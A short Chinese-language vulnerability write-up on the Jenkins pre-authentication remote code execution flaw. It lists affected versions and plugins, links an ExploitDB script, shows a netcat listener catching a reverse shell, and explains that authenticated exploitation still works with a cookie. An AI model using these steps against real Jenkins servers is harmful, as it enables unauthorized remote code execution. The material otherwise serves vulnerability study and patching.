参考资源

• https://www.exploit-db.com/exploits/46453
• http://blog.orange.tw/2019/02/abusing-meta-programming-for-unauthenticated-rce.html

漏洞概述

本文主要分析Orange Tsai发现的Jenkins前置认证漏洞利用技术。

受影响版本

• Jenkins < 2.137（支持前置认证）

受影响的插件

• Pipeline: Declarative Plugin 至1.3.4版本
• Pipeline: Groovy Plugin 至2.61版本
• Script Security Plugin 至1.49版本（在CG的测试中，1.50版本也存在漏洞）

漏洞利用

上述ExploitDB链接提供了一个完整的利用脚本，能够编译jar文件并供存在漏洞的Jenkins服务器下载执行。

攻击演示

1
2
3
4
5

nc -l 8888 -vv

whoami
bash: no job control in this shell
bash-3.2$ jenkins

后续版本影响

在Jenkins 2.138之后，前置认证漏洞已被修复。但如果攻击者拥有读取权限令牌且相关插件仍然存在漏洞，依然可以 exploitation 该服务器。只需在脚本中添加认证cookie，即可通过认证状态继续利用该漏洞。